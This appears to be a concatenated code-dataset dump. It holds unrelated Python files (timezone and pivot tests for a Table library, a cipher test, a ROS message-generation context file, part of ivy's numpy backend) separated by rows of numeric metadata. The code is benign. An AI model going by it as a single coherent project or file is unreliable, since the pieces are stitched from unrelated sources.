ACT = tz.gettz("Australia/Sydney")
assert table.view().to_dict() == {
"a": [d.astimezone(ACT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_pytz_pacific_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "US/Pacific"
time.tzset()
# Should be in PST now
assert table.view().to_dict()["a"] == [d.astimezone(PST).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_pytz_central_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "US/Central"
time.tzset()
# Should be in CST now
assert table.view().to_dict()["a"] == [d.astimezone(CST).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_pytz_eastern_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "US/Eastern"
time.tzset()
# Should be in EST now
assert table.view().to_dict()["a"] == [d.astimezone(EST).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_pytz_GMT_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "GMT"
time.tzset()
# Should be in GMT now
assert table.view().to_dict()["a"] == [d.astimezone(GMT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_pytz_HKT_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "Asia/Hong_Kong"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(HKT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_pytz_JPT_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "Asia/Tokyo"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(JPT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_pytz_ACT_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "Australia/Sydney"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(ACT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_dateutil_pacific_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "US/Pacific"
time.tzset()
# Should be in PST now
assert table.view().to_dict()["a"] == [d.astimezone(PST).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_dateutil_central_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "US/Central"
time.tzset()
CST = tz.gettz("US/Central")
# Should be in CST now
assert table.view().to_dict()["a"] == [d.astimezone(CST).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_dateutil_eastern_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "US/Eastern"
time.tzset()
# Should be in EST now
assert table.view().to_dict()["a"] == [d.astimezone(EST).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_dateutil_GMT_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "GMT"
time.tzset()
GMT = tz.gettz("GMT")
# Should be in GMT now
assert table.view().to_dict()["a"] == [d.astimezone(GMT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_dateutil_HKT_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "Asia/Hong_Kong"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(HKT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_dateutil_JPT_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "Asia/Tokyo"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(JPT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_dateutil_ACT_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "Australia/Sydney"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(ACT).replace(tzinfo=None) for d in data["a"]]
class TestTableDateTimeArbitaryToLocal(object):
def teardown_method(self):
# Set timezone to UTC, always
os.environ["TZ"] = "UTC"
time.tzset()
def test_table_should_convert_PST_to_local_time_pytz_central(self):
data = {
"a": TZ_DATETIMES["US/Pacific"]
}
table = Table(data)
os.environ["TZ"] = "US/Central"
time.tzset()
# Should be in CST now
assert table.view().to_dict() == {
"a": [d.astimezone(CST).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_CST_to_local_time_pytz_eastern(self):
data = {
"a": TZ_DATETIMES["US/Central"]
}
table = Table(data)
os.environ["TZ"] = "US/Eastern"
time.tzset()
# Should be in EST now
assert table.view().to_dict() == {
"a": [d.astimezone(EST).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_EST_to_local_time_pytz_GMT(self):
data = {
"a": TZ_DATETIMES["US/Eastern"]
}
table = Table(data)
os.environ["TZ"] = "GMT"
time.tzset()
# Should be in GMT now
assert table.view().to_dict() == {
"a": [d.astimezone(GMT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_GMT_to_local_time_pytz_HKT(self):
data = {
"a": TZ_DATETIMES["GMT"]
}
table = Table(data)
os.environ["TZ"] = "Asia/Hong_Kong"
time.tzset()
assert table.view().to_dict() == {
"a": [d.astimezone(HKT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_HKT_to_local_time_pytz_JPT(self):
data = {
"a": TZ_DATETIMES["Asia/Hong_Kong"]
}
table = Table(data)
os.environ["TZ"] = "Asia/Tokyo"
time.tzset()
assert table.view().to_dict() == {
"a": [d.astimezone(JPT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_JPT_to_local_time_pytz_ACT(self):
data = {
"a": TZ_DATETIMES["Asia/Tokyo"]
}
table = Table(data)
os.environ["TZ"] = "Australia/Sydney"
time.tzset()
assert table.view().to_dict() == {
"a": [d.astimezone(ACT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_PST_to_local_time_dateutil_central(self):
data = {
"a": TZ_DATETIMES["US/Pacific"]
}
table = Table(data)
os.environ["TZ"] = "US/Central"
time.tzset()
# Should be in CST now
assert table.view().to_dict() == {
"a": [d.astimezone(CST).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_CST_to_local_time_dateutil_eastern(self):
data = {
"a": TZ_DATETIMES["US/Central"]
}
table = Table(data)
os.environ["TZ"] = "US/Eastern"
time.tzset()
# Should be in EST now
assert table.view().to_dict() == {
"a": [d.astimezone(EST).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_EST_to_local_time_dateutil_GMT(self):
data = {
"a": TZ_DATETIMES["US/Eastern"]
}
table = Table(data)
os.environ["TZ"] = "GMT"
time.tzset()
# Should be in GMT now
assert table.view().to_dict() == {
"a": [d.astimezone(GMT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_GMT_to_local_time_dateutil_HKT(self):
data = {
"a": TZ_DATETIMES["GMT"]
}
table = Table(data)
os.environ["TZ"] = "Asia/Hong_Kong"
time.tzset()
assert table.view().to_dict() == {
"a": [d.astimezone(HKT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_HKT_to_local_time_dateutil_JPT(self):
data = {
"a": TZ_DATETIMES["Asia/Hong_Kong"]
}
table = Table(data)
os.environ["TZ"] = "Asia/Tokyo"
time.tzset()
assert table.view().to_dict() == {
"a": [d.astimezone(JPT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_JPT_to_local_time_dateutil_ACT(self):
data = {
"a": TZ_DATETIMES["Asia/Tokyo"]
}
table = Table(data)
os.environ["TZ"] = "Australia/Sydney"
time.tzset()
assert table.view().to_dict() == {
"a": [d.astimezone(ACT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_PST_to_local_time_pytz_central_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["US/Pacific"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "US/Central"
time.tzset()
# Should be in CST now
assert table.view().to_dict()["a"] == [d.astimezone(CST).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_CST_to_local_time_pytz_eastern_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["US/Central"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "US/Eastern"
time.tzset()
# Should be in EST now
assert table.view().to_dict()["a"] == [d.astimezone(EST).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_EST_to_local_time_pytz_GMT_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["US/Eastern"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "GMT"
time.tzset()
# Should be in GMT now
assert table.view().to_dict()["a"] == [d.astimezone(GMT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_GMT_to_local_time_pytz_HKT_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["GMT"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "Asia/Hong_Kong"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(HKT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_HKT_to_local_time_pytz_JPT_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["Asia/Hong_Kong"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "Asia/Tokyo"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(JPT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_JPT_to_local_time_pytz_ACT_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["Asia/Tokyo"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "Australia/Sydney"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(ACT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_PST_to_local_time_dateutil_central_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["US/Pacific"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "US/Central"
time.tzset()
# Should be in CST now
assert table.view().to_dict()["a"] == [d.astimezone(CST).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_CST_to_local_time_dateutil_eastern_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["US/Central"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "US/Eastern"
time.tzset()
# Should be in EST now
assert table.view().to_dict()["a"] == [d.astimezone(EST).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_EST_to_local_time_dateutil_GMT_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["US/Eastern"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "GMT"
time.tzset()
# Should be in GMT now
assert table.view().to_dict()["a"] == [d.astimezone(GMT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_GMT_to_local_time_dateutil_HKT_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["GMT"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "Asia/Hong_Kong"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(HKT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_HKT_to_local_time_dateutil_JPT_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["Asia/Hong_Kong"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "Asia/Tokyo"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(JPT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_JPT_to_local_time_dateutil_ACT_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["Asia/Tokyo"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "Australia/Sydney"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(ACT).replace(tzinfo=None) for d in data["a"]]
class TestTableDateTimePivots(object):
def test_table_row_pivot_date_correct(self):
data = {
"a": [date(2020, i, 15) for i in range(1, 13)],
"b": [i for i in range(1, 13)]
}
table = Table(data)
view = table.view(row_pivots=["a"])
assert view.to_columns() == {
"__ROW_PATH__": [
[],
['2020-01-15'],
['2020-02-15'],
['2020-03-15'],
['2020-04-15'],
['2020-05-15'],
['2020-06-15'],
['2020-07-15'],
['2020-08-15'],
['2020-09-15'],
['2020-10-15'],
['2020-11-15'],
['2020-12-15']
],
"a": [12, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
"b": [78, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]
}
def test_table_row_pivot_pandas_date_correct(self):
data = {
"a": [date(2020, i, 15) for i in range(1, 13)],
"b": [i for i in range(1, 13)]
}
table = Table(pd.DataFrame(data))
view = table.view(row_pivots=["a"])
assert view.to_columns() == {
"__ROW_PATH__": [
[],
['2020-01-15'],
['2020-02-15'],
['2020-03-15'],
['2020-04-15'],
['2020-05-15'],
['2020-06-15'],
['2020-07-15'],
['2020-08-15'],
['2020-09-15'],
['2020-10-15'],
['2020-11-15'],
['2020-12-15']
],
"index": [66, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11],
"a": [12, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
"b": [78, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]
}
def test_table_column_pivot_date_correct(self):
data = {
"a": [date(2020, i, 15) for i in range(1, 13)],
"b": [i for i in range(1, 13)]
}
table = Table(data)
view = table.view(column_pivots=["a"])
assert view.to_columns() == {
'2020-01-15|a': [datetime(2020, 1, 15, 0, 0),
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-01-15|b': [1,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-02-15|a': [None,
datetime(2020, 2, 15, 0, 0),
None,
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-02-15|b': [None,
2,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-03-15|a': [None,
None,
datetime(2020, 3, 15, 0, 0),
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-03-15|b': [None,
None,
3,
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-04-15|a': [None,
None,
None,
datetime(2020, 4, 15, 0, 0),
None,
None,
None,
None,
None,
None,
None,
None],
'2020-04-15|b': [None,
None,
None,
4,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-05-15|a': [None,
None,
None,
None,
datetime(2020, 5, 15, 0, 0),
None,
None,
None,
None,
None,
None,
None],
'2020-05-15|b': [None,
None,
None,
None,
5,
None,
None,
None,
None,
None,
None,
None],
'2020-06-15|a': [None,
None,
None,
None,
None,
datetime(2020, 6, 15, 0, 0),
None,
None,
None,
None,
None,
None],
'2020-06-15|b': [None,
None,
None,
None,
None,
6,
None,
None,
None,
None,
None,
None],
'2020-07-15|a': [None,
None,
None,
None,
None,
None,
datetime(2020, 7, 15, 0, 0),
None,
None,
None,
None,
None],
'2020-07-15|b': [None,
None,
None,
None,
None,
None,
7,
None,
None,
None,
None,
None],
'2020-08-15|a': [None,
None,
None,
None,
None,
None,
None,
datetime(2020, 8, 15, 0, 0),
None,
None,
None,
None],
'2020-08-15|b': [None,
None,
None,
None,
None,
None,
None,
8,
None,
None,
None,
None],
'2020-09-15|a': [None,
None,
None,
None,
None,
None,
None,
None,
datetime(2020, 9, 15, 0, 0),
None,
None,
None],
'2020-09-15|b': [None,
None,
None,
None,
None,
None,
None,
None,
9,
None,
None,
None],
'2020-10-15|a': [None,
None,
None,
None,
None,
None,
None,
None,
None,
datetime(2020, 10, 15, 0, 0),
None,
None],
'2020-10-15|b': [None,
None,
None,
None,
None,
None,
None,
None,
None,
10,
None,
None],
'2020-11-15|a': [None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
datetime(2020, 11, 15, 0, 0),
None],
'2020-11-15|b': [None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
11,
None],
'2020-12-15|a': [None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
datetime(2020, 12, 15, 0, 0)],
'2020-12-15|b': [None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
12]
}
def test_table_column_pivot_pandas_date_correct(self):
data = {
"a": [date(2020, i, 15) for i in range(1, 13)],
"b": [i for i in range(1, 13)]
}
table = Table(pd.DataFrame(data))
view = table.view(columns=["a", "b"], column_pivots=["a"])
assert view.to_columns() == {
'2020-01-15|a': [datetime(2020, 1, 15, 0, 0),
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-01-15|b': [1,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-02-15|a': [None,
datetime(2020, 2, 15, 0, 0),
None,
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-02-15|b': [None,
2,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-03-15|a': [None,
None,
datetime(2020, 3, 15, 0, 0),
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-03-15|b': [None,
None,
3,
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-04-15|a': [None,
None,
None,
datetime(2020, 4, 15, 0, 0),
None,
None,
None,
None,
None,
None,
None,
None],
'2020-04-15|b': [None,
None,
None,
4,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-05-15|a': [None,
None,
None,
None,
datetime(2020, 5, 15, 0, 0),
None,
None,
None,
None,
None,
None,
None],
'2020-05-15|b': [None,
None,
None,
None,
5,
None,
None,
None,
None,
None,
None,
None],
'2020-06-15|a': [None,
None,
None,
None,
None,
datetime(2020, 6, 15, 0, 0),
None,
None,
None,
None,
None,
None],
'2020-06-15|b': [None,
None,
None,
None,
None,
6,
None,
None,
None,
None,
None,
None],
'2020-07-15|a': [None,
None,
None,
None,
None,
None,
datetime(2020, 7, 15, 0, 0),
None,
None,
None,
None,
None],
'2020-07-15|b': [None,
None,
None,
None,
None,
None,
7,
None,
None,
None,
None,
None],
'2020-08-15|a': [None,
None,
None,
None,
None,
None,
None,
datetime(2020, 8, 15, 0, 0),
None,
None,
None,
None],
'2020-08-15|b': [None,
None,
None,
None,
None,
None,
None,
8,
None,
None,
None,
None],
'2020-09-15|a': [None,
None,
None,
None,
None,
None,
None,
None,
datetime(2020, 9, 15, 0, 0),
None,
None,
None],
'2020-09-15|b': [None,
None,
None,
None,
None,
None,
None,
None,
9,
None,
None,
None],
'2020-10-15|a': [None,
None,
None,
None,
None,
None,
None,
None,
None,
datetime(2020, 10, 15, 0, 0),
None,
None],
'2020-10-15|b': [None,
None,
None,
None,
None,
None,
None,
None,
None,
10,
None,
None],
'2020-11-15|a': [None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
datetime(2020, 11, 15, 0, 0),
None],
'2020-11-15|b': [None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
11,
None],
'2020-12-15|a': [None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
datetime(2020, 12, 15, 0, 0)],
'2020-12-15|b': [None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
12]
}
| 33.927632
| 114
| 0.377757
| 5,167
| 56,727
| 3.964002
| 0.03832
| 0.171858
| 0.210917
| 0.224978
| 0.926374
| 0.914364
| 0.901377
| 0.890294
| 0.882677
| 0.881213
| 0
| 0.046418
| 0.519964
| 56,727
| 1,671
| 115
| 33.947935
| 0.70574
| 0.035168
| 0
| 0.814089
| 0
| 0
| 0.040712
| 0
| 0
| 0
| 0
| 0
| 0.058097
| 1
| 0.061002
| false
| 0
| 0.00581
| 0
| 0.069717
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
bc5ed4492fbb895792dd72da4bd72b52576c1a64
| 229
|
py
|
Python
|
tests/test_cipher_yd2564.py
|
QMSS-G5072-2020/cipher_dong_yifei
|
c64fad3dc2d723f16a2568aeff68d297a490a1cf
|
[
"MIT"
] | null | null | null |
tests/test_cipher_yd2564.py
|
QMSS-G5072-2020/cipher_dong_yifei
|
c64fad3dc2d723f16a2568aeff68d297a490a1cf
|
[
"MIT"
] | null | null | null |
tests/test_cipher_yd2564.py
|
QMSS-G5072-2020/cipher_dong_yifei
|
c64fad3dc2d723f16a2568aeff68d297a490a1cf
|
[
"MIT"
] | null | null | null |
from cipher_yd2564 import __version__
from cipher_yd2564 import cipher_yd2564
def test_version():
assert __version__ == '0.1.1'
def test_negative_shift():
assert cipher_yd2564.cipher('the', -1, encrypt=True) == 'sgd'
| 20.818182
| 65
| 0.742358
| 32
| 229
| 4.84375
| 0.5
| 0.309677
| 0.206452
| 0.283871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 0.148472
| 229
| 10
| 66
| 22.9
| 0.692308
| 0
| 0
| 0
| 0
| 0
| 0.048035
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bcbfa12609e4b30a7a17158f6c3c32a85a5a89a4
| 38
|
py
|
Python
|
DL/__init__.py
|
GrayFlash/100_Days_ML_CODE
|
7c0ae04de50e7056d26019216c4f4dc8eda341d3
|
[
"Unlicense"
] | null | null | null |
DL/__init__.py
|
GrayFlash/100_Days_ML_CODE
|
7c0ae04de50e7056d26019216c4f4dc8eda341d3
|
[
"Unlicense"
] | null | null | null |
DL/__init__.py
|
GrayFlash/100_Days_ML_CODE
|
7c0ae04de50e7056d26019216c4f4dc8eda341d3
|
[
"Unlicense"
] | null | null | null |
from .L_layered_NN import L_layered_NN
| 38
| 38
| 0.894737
| 8
| 38
| 3.75
| 0.625
| 0.533333
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078947
| 38
| 1
| 38
| 38
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
bcdc5d842f44cb5d53ced099e227b0563d758387
| 1,941
|
py
|
Python
|
catkin_ws/build/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/cmake/dynamixel_controllers-genmsg-context.py
|
Gabriellavoura/Cyton-Gamma-1500
|
7380000c0e4b2d71830fbc4b28c3b1ac5b750eeb
|
[
"MIT"
] | 1
|
2020-10-06T14:02:44.000Z
|
2020-10-06T14:02:44.000Z
|
catkin_ws/build/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/cmake/dynamixel_controllers-genmsg-context.py
|
Gabriellavoura/Cyton-Gamma-1500
|
7380000c0e4b2d71830fbc4b28c3b1ac5b750eeb
|
[
"MIT"
] | null | null | null |
catkin_ws/build/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/cmake/dynamixel_controllers-genmsg-context.py
|
Gabriellavoura/Cyton-Gamma-1500
|
7380000c0e4b2d71830fbc4b28c3b1ac5b750eeb
|
[
"MIT"
] | null | null | null |
# generated from genmsg/cmake/pkg-genmsg.context.in
messages_str = ""
services_str = "/home/gabriel/Cyton_ROS/Cyton-Gamma-1500/catkin_ws/src/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/srv/RestartController.srv;/home/gabriel/Cyton_ROS/Cyton-Gamma-1500/catkin_ws/src/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/srv/SetComplianceMargin.srv;/home/gabriel/Cyton_ROS/Cyton-Gamma-1500/catkin_ws/src/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/srv/SetCompliancePunch.srv;/home/gabriel/Cyton_ROS/Cyton-Gamma-1500/catkin_ws/src/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/srv/SetComplianceSlope.srv;/home/gabriel/Cyton_ROS/Cyton-Gamma-1500/catkin_ws/src/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/srv/SetSpeed.srv;/home/gabriel/Cyton_ROS/Cyton-Gamma-1500/catkin_ws/src/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/srv/SetTorqueLimit.srv;/home/gabriel/Cyton_ROS/Cyton-Gamma-1500/catkin_ws/src/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/srv/StartController.srv;/home/gabriel/Cyton_ROS/Cyton-Gamma-1500/catkin_ws/src/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/srv/StopController.srv;/home/gabriel/Cyton_ROS/Cyton-Gamma-1500/catkin_ws/src/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/srv/TorqueEnable.srv"
pkg_name = "dynamixel_controllers"
dependencies_str = ""
langs = "gencpp;geneus;genlisp;gennodejs;genpy"
dep_include_paths_str = ""
PYTHON_EXECUTABLE = "/usr/bin/python2"
package_has_static_sources = 'TRUE' == 'TRUE'
genmsg_check_deps_script = "/opt/ros/melodic/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py"
| 161.75
| 1,546
| 0.871716
| 280
| 1,941
| 5.692857
| 0.235714
| 0.112923
| 0.090339
| 0.107277
| 0.726474
| 0.726474
| 0.726474
| 0.726474
| 0.726474
| 0.726474
| 0
| 0.052438
| 0.017517
| 1,941
| 11
| 1,547
| 176.454545
| 0.783429
| 0.025245
| 0
| 0
| 1
| 0.111111
| 0.892593
| 0.879894
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
4c161cf940fca1200c3e1073eef7490aac14a284
| 13,407
|
py
|
Python
|
ivy/functional/backends/numpy/elementwise.py
|
VedPatwardhan/ivy
|
7b2105fa8cf38879444a1029bfaa7f0b2f27717a
|
[
"Apache-2.0"
] | null | null | null |
ivy/functional/backends/numpy/elementwise.py
|
VedPatwardhan/ivy
|
7b2105fa8cf38879444a1029bfaa7f0b2f27717a
|
[
"Apache-2.0"
] | null | null | null |
ivy/functional/backends/numpy/elementwise.py
|
VedPatwardhan/ivy
|
7b2105fa8cf38879444a1029bfaa7f0b2f27717a
|
[
"Apache-2.0"
] | null | null | null |
# global
import numpy as np
from typing import Optional, Callable
import functools
# local
import ivy
try:
from scipy.special import erf as _erf
except (ImportError, ModuleNotFoundError):
_erf = None
# when inputs are 0 dimensional, numpy's functions return scalars
# so we use this wrapper to ensure outputs are always numpy arrays
def _handle_0_dim_output(function: Callable) -> Callable:
@functools.wraps(function)
def new_function(*args, **kwargs):
ret = function(*args, **kwargs)
return np.asarray(ret) if not isinstance(ret, np.ndarray) else ret
return new_function
@_handle_0_dim_output
def add(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
if hasattr(x1, "dtype") and hasattr(x2, "dtype"):
promoted_type = np.promote_types(x1.dtype, x2.dtype)
x1, x2 = np.asarray(x1), np.asarray(x2)
x1 = x1.astype(promoted_type)
x2 = x2.astype(promoted_type)
elif not isinstance(x2, np.ndarray):
x2 = np.asarray(x2, dtype=x1.dtype)
return np.add(np.asarray(x1), np.asarray(x2), out=out)
@_handle_0_dim_output
def pow(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
if hasattr(x1, "dtype") and hasattr(x2, "dtype"):
promoted_type = np.promote_types(x1.dtype, x2.dtype)
x1, x2 = np.asarray(x1), np.asarray(x2)
x1 = x1.astype(promoted_type)
x2 = x2.astype(promoted_type)
elif not hasattr(x2, "dtype"):
x2 = np.array(x2, dtype=x1.dtype)
return np.power(x1, x2, out=out)
@_handle_0_dim_output
def bitwise_xor(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
if not isinstance(x2, np.ndarray):
x2 = np.asarray(x2, dtype=x1.dtype)
else:
dtype = np.promote_types(x1.dtype, x2.dtype)
x1 = x1.astype(dtype)
x2 = x2.astype(dtype)
return np.bitwise_xor(x1, x2, out=out)
